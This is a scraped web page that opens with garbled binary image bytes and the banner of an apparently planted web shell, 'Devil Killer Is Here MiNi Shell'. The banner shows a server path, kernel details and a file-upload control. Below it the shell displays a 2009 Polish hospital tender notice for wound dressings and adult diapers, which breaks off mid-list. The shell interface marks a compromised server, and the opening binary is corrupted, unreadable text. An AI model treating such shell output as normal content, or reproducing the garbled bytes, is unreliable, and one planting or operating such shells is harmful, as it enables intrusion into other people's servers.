JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090211/24632-N-2009.html

<p class="kh_header"><b>Kędzierzyn-Koźle: Dostawa środków opatrunkowych i pieluchomajtek dla SP ZOZ 
w Kędzierzynie-Koźlu.</b><br>
<b>Numer ogłoszenia: 24632 - 2009; data zamieszczenia: 11.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej , ul. 24 Kwietnia 5, 47-200 Kędzierzyn-Koźle, woj. opolskie, tel. 077 4062566, faks 077 4062544.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdrowie-kk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków opatrunkowych i pieluchomajtek dla SP ZOZ 
w Kędzierzynie-Koźlu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet 1 - Dostawa środków opatrunkowych wg załącznika 2/1 do SIWZ ;
Pakiet 2 - Dostawa środków opatrunkowych wg załącznika 2/2 do SIWZ ;
Pakiet 3 - Dostawa środków opatrunkowych wg załącznika 2/3 do SIWZ ;
Pakiet 4 - Dostawa opatrunków ocznych wg załącznika 2/4 do SIWZ ;
Pakiet 5 - Dostawa środków opatrunkowych wg załącznika 2/5 do SIWZ ;
Pakiet 6 - Dostawa opatrunków specjalistycznych wg załącznika 2/6 do SIWZ ;
Pakiet 7 - Dostawa folii chirurgicznej samoprzylepnej wg załącznika 2/7 do SIWZ ;
Pakiet 8 - Dostawa pieluchomajtek wg załącznika 2/8 do SIWZ ;
Pakiet 9 - Dostawa środków opatrunkowych wg załącznika 2/9 do SIWZ;
Pakiet 10 - Dostawa środków opatrunkowych wg załącznika 2/10 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.19-7, 33.14.11.15-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do przetargu Wykonawca jest obowiązany wnieść wadium w wysokości:

1 pakiet - 1450,00 zł (słownie: jeden tysiąc czterysta pięćdziesiąt złotych 00/100)
2 pakiet - 120,00 zł (słownie: sto dwadzieścia zł 00/100)  
3 pakiet - 215,00 zł  (słownie: dwieście piętnaście zł 00/100)  
4 pakiet - 27,00 zł  (słownie: dwadzieścia siedem zł 00/100)  
5 pakiet - 2060,00 zł  (słownie: dwa tysiące sześćdziesiąt zł 00/100)  
6 pakiet - 700,00 zł  (słownie: siedemset zł 00/100)  
7 pakiet - 45,00 zł (słownie: czterdzieści pięć zł 00/100)  
8 pakiet - 230,00 zł (słownie: dwieście trzydzieści zł 00/100) 
9 pakiet - 135,00 zł (słownie: sto trzydzieści pięć zł 00/100) 
10 pakiet - 1015,00 zł (słownie: jeden tysiąc piętnaście zł 00/100)   

RAZEM: 5.997zł (słownie: pięć tysięcy dziewięćset dziewięćdziesiąt siedem zł 00/100 )

Wadium płatne do dnia 20.02.2009r. do godz. 8:15 na konto  w BZ WBK Oddział Kędzierzyn-Koźle  numer konta 29 1090 2183 0000 0005 6600 2928 (liczy się data wpływu na w/w konto). Do potwierdzenia wpłacenia wadium należy zamieścić kopię dokumentu w ofercie.
Forma wpłaty wadium:
1. Wadium może być wnoszone w:
-	pieniądzu ;
-	poręczeniu bankowym lub poręczeniu spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym ;
-	gwarancjach bankowych ;
-	gwarancjach ubezpieczeniowych ;
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 z późn. zm.) ;

W przypadku wnoszenia wadium w innej formie niż pieniądz oryginał należy złożyć w Sekcji Finansowo-księgowej pok. nr 9 w budynku Dyrekcji SPZOZ, ul. 24 Kwietnia 5, 47-200 Kędzierzyn-Koźle do dnia 20.02.2009r. do godz. 8:15, natomiast kopię należy zamieścić w ofercie. 
2. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.

Zwrot wadium:
1.	Zamawiający jest obowiązany niezwłocznie zwrócić wadium, jeżeli:
a)	upłynął termin związania ofertą ;
b)	zawarto umowę;
	c)	zamawiający unieważnił postępowanie, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin ich składania;
2.	Z zastrzeżeniem art. 46 ust. 4a Zamawiający niezwłocznie zwróci  wadium na wniosek Wykonawcy który:
	a)	wycofał ofertę przed upływem terminu składania ofert;
	b)	został wykluczony z postępowania;
	c)	którego oferta została odrzucona;
3.	Złożenie przez Wykonawcę, którego oferta została odrzucona lub wykluczonego z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez Wykonawcę prawa do wniesienia protestu.
4.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
5.	Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz zamawiającego w przypadku gdy:
a)	odmówi podpisania umów na warunkach określonych w ofercie;
	b)	zawarcie umów stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
6.     Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym    mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
7.     Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
W ofercie (formularzu ofertowym - zał. 1 do SIWZ) należy podać numer konta, na jakie Zamawiający dokona zwrotu wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> V. Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków.   V.1. Warunki udziału w postępowaniu o zamówienie publiczne. 
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 1.2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie do  innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 1.3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 1.4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
 
V.2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy: a) nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 PZP opisanych w pkt. V.1.,  b) nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 PZP,  c) wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji,  d) złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania,  e) nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 oraz art. 26 ust.4 PZP ,  f) nie zgodzili się na przedłużenie okresu związania ofertą.

V.3. Zamawiający odrzuca ofertę wykonawcy: a) niezgodną z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia z zastrzeżeniem art. 87 ust. 2 pkt 3) PZP
b) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,  c) zawierającą rażąco niską cenę w stosunku do przedmiotu zamówienia,   d) wykluczonego z udziału w postępowaniu o udzielenie zamówienia,  e) zawierającą omyłki rachunkowe w obliczeniu ceny, których nie można poprawić na podstawie art. 87 ust. 2 PZP  f) który w terminie 3 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3) PZP  g) nieważnej na podstawie odrębnych przepisów,  h) w przypadku braku zgody na przedłużenie okresu związania ofertą.  

V.4. Zamawiający dokona badania ofert pod kątem spełniania wymogów SIWZ oraz naruszenia zasad ustawy PZP.

V.5. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu i dokumentach, które dostarczy Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu
V.6. Forma prawna, jaką musi przyjąć grupa wykonawców, której zostanie udzielone zamówienie:
O zamówienie mogą  ubiegać się Wykonawcy oraz Wykonawcy występujący wspólnie którzy: posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie do  innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej wykonawców w formie konsorcjum w rozumieniu art. 23 PZP. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez kilku wykonawców (konsorcjum) oferta dodatkowo musi zawierać:
a) pełnomocnictwo dla podmiotu reprezentującego w postępowaniu wykonawców wchodzących w skład konsorcjum. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania konsorcjum w tym do dokonywania wszelkich czynności w toku postępowania, w szczególności do korespondencji z zamawiającym, składania i odbierania wszelkich oświadczeń w tym oświadczeń woli, wszelkich dokumentów w toku postępowania, składania protestów oraz do podpisania umowy.
b) dokumenty:
- Aktualny odpis z właściwego rejestru;
- Zaświadczenie z właściwego organu podatkowego oraz ZUS;
- Oświadczenie o spełnieniu warunków udziału w postępowaniu.
c) Dokumenty te muszą być wystawione dla każdego z wykonawców wchodzących w skład konsorcjum..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> VI. Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.  VI.A. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu z postępowania: A.1) Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym. 
A.2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.   A.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.   A.4) Oświadczenie Wykonawcy - załącznik nr 3 do niniejszej siwz.
 VI.B.  W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w niniejszej specyfikacji istotnych warunków zamówienia do oferty należy dołączyć następujące dokumenty:
B.1) Oświadczenie Wykonawcy, że oferowany przedmiot zamówienia posiada deklarację zgodności CE i jest dopuszczony do obrotu na polskim rynku z dokładnym oznaczeniem do którego pakietu i pozycji odnosi się dany dokument. Zamawiający zastrzega sobie prawo do weryfikacji treści oświadczenia poprzez żądanie dokumentów potwierdzających treść oświadczenia.
B.2) Dołączyć próbki po 1 sztuce z każdego asortymentu, na który wykonawca złoży ofertę, celem sprawdzenia zgodności oferowanego przedmiotu zamówienia z opisem Zamawiającego. Ocena zgodności oferowanego przedmiotu zamówienia z opisem wynikającym z SIWZ odbywać się będzie na podstawie zapisu na opakowaniu dostarczonych próbek wymagany opis na opakowaniu w j.polskim. Brak możliwości oceny zgodności oferowanego przedmiotu zamówienia z opisem SIWZ skutkować będzie odrzuceniem oferty.

VI.C. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej: Zamiast dokumentów, o których mowa w pkt. A.3) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.   VI.D. Dokumenty wymagane w przypadku składania oferty wspólnej:  Oferta winna zawierać oświadczenia i dokumenty opisane w pkt. A dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.   
 VI.E. Inne dokumenty jakie należy dołączyć do oferty:
E.1) Wypełniony Formularz ofertowy - zał. nr 1 do SIWZ;
E.2) Wypełniony Formularz cenowy - zał. nr 2/1 - 2/10 do SIWZ;
E.3) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych. 
E.4) Kopia dowodu wpłaty wadium.      
Wymienione dokumenty z pkt. A.1-A.3, B.1, E.4)  mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem. Dokumenty wymienione w pkt. A.4, E.1, E.2) winny być złożone w formie oryginału. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
Pełnomocnictwo (E.3.) należy złożyć w formie oryginału lub kopii potwierdzonej notarialnie. 
VI.F. Forma prawna, jaką musi przyjąć grupa wykonawców, której zostanie udzielone zamówienie:  
Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej wykonawców w formie konsorcjum w rozumieniu art. 23 PZP. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez kilku wykonawców (konsorcjum) oferta dodatkowo musi zawierać:
a) pełnomocnictwo dla podmiotu reprezentującego w postępowaniu wykonawców wchodzących w skład konsorcjum. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania konsorcjum w tym do dokonywania wszelkich czynności w toku postępowania, w szczególności do korespondencji z zamawiającym, składania i odbierania wszelkich oświadczeń w tym oświadczeń woli, wszelkich dokumentów w toku postępowania, składania protestów oraz do podpisania umowy.
b) dokumenty:
- Aktualny odpis z właściwego rejestru;
- Zaświadczenie z właściwego organu podatkowego oraz ZUS;
- Oświadczenie o spełnieniu warunków udziału w postępowaniu.
c) Dokumenty te muszą być wystawione dla każdego z wykonawców wchodzących w skład konsorcjum..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdrowie-kk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ Kędzierzyn-Koźle
ul. 24 Kwietnia 5
47-200 Kędzierzyn-Koźle
pokój nr 19.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2009 godzina 08:15, miejsce: SP ZOZ Kędzierzyn-Koźle
ul. 24 Kwietnia 5
47-200 Kędzierzyn-Koźle
pokój nr 19.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa środków opatrunkowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Syntetyczny bandaż podgipsowy 15 cm  300cm
2)	Gaza bawełniana niejałowa w składkach 90 cm x 13n kl.II a reguła 7
3)	Gaza bawełniana wyjałowiona  0,5 m2 17 - nitkowa / sterylizacja parą wodną /
4)	Gaza bawełniana wyjałowiona 1m2 17 nitkowa  /sterylizacja para wodną/
5)	Kompresy gazowe niewyjałowione 13 - nitkowe 8 - warstwowe 5 cm x 5 cm x 100 szt   / /kl.II a  ,reguła 7/
6)	Kompresy gazowe niewyjałowione 13 - nitkowe 8 - warstwowe 7,5 cm x 7,5 cm x 100 szt  /kl. IIa ,reguła 7/
7)	Kompresy gazowe niewyjałowione 13 - nitkowe 8 - warstwowe 10 cm x 10 cm x 100 szt  /kl.IIa ,reguła 7/
8)	Lignina arkusze (w opakowaniach á 5 kg)  /bielona/
9)	Opaska dziana podtrzymująca 4m x 10 cm / pakowana pojedynczo /
10)	Opaska dziana podtrzymująca 4m x 5 cm   /pakowane pojedynczo/
11)	Opaska dziana podtrzymująca 4m x 15 cm /pakowane pojedynczo/
12)	Opaska elastyczna tkana z zapinką 4m x 10 cm/pakowane pojedynczo/
13)	Opaska elastyczna tkana z zapinką 4 m x 15 cm  /pakowane pojedynczo/
14)	Opaska gipsowa S 3m x 10 cm   4-6 minut
15)	Opaska gipsowa S 3m x 12 cm 4-6 minut
16)	Wata opatrunkowa bawełniano - wiskozowa 200g
17)	Wata opatrunkowa bawełniano - wiskozowa 500g
18)	Niesterylne serwety gazowe operacyjne z tasiemką 40-45 x 40-45 + element RTG 4 warstwy ,min . 17 nitek.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.13-4, 33.14.11.19-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa środków opatrunkowych..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Wchłanialna, sterylna, nierozpuszczalna w wodzie gąbka żelatynowa z efektem hemostatycznym 70cm x 50cm x 1 cm
2)	Wchłanialna, sterylna nierozpuszczalna w wodzie gąbka żelatynowa z efektem hemostatycznym 70cm x 50cm x 0,1cm.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa środków opatrunkowych..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Przylepiec opatrunkowy na  włókninie, perforowanej, półelastycznej  10m x 20cm  z klejem akrylowym lub z syntetycznego kauczuku
2)	Przylepiec opatrunkowy na  włókninie, perforowanej, półelastycznej  10m x 15cm  z klejem akrylowym lub z syntetycznego kauczuku
3)	Przylepiec na tkaninie ze sztucznego jedwabiu z klejem akrylowym, lub z syntetycznego kauczuku hypoalergiczny 5m x 1,25cm
4)	Przylepiec na tkaninie za sztucznego jedwabiu z klejem akrylowym, lub z syntetycznego kauczuku hypoalergiczny 5m x 2,5cm
5)	Przylepiec na tkaninie ze sztucznego jedwabiu z klejem akrylowym, lub z syntetycznego kauczuku hypoalergiczny 5m x 5cm
6)	Przylepiec na tkaninie z klejem akrylowym lub z syntetycznego kauczuku
 5m x 2,5 cm
7)	Przylepiec na tkaninie z klejem akrylowym  lub z syntetycznego kauczuku
5m x 5 cm
8)	Plaster hypoalergiczny z centralnym opatrunkiem, jałowy 10cm x 10cm włókninowy z klejem akrylowym , lub z syntetycznego kauczuku
9)	Plaster hypoalergiczny z centralnym opatrunkiem, jałowy 10cm x 15cm włókninowy  z klejem akrylowym , lub z syntetycznego kauczuku
10)	Plaster hypoalergiczny z centralnym opatrunkiem, jałowy 10cm x 20cm włókninowy z klejem akrylowym , lub z syntetycznego kauczuku
11)	Plaster hypoalergiczny z centralnym opatrunkiem, jałowy 10cm x 25cm włókninowy z klejem akrylowym , lub z syntetycznego kauczuku
12)	Plaster na włókninie , hypoalergiczny  8cm z opatrunkiem z klejem akrylowym , lub z syntetycznego kauczuku
13)	Opatrunek do mocowania wenflonów  jałowy ,z nacięciem ,włókninowy  -5 cm -6cm  x 7cm-  8cm.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.11-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa opatrunków ocznych..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Opatrunek oczny jałowy 56 x 70 mm
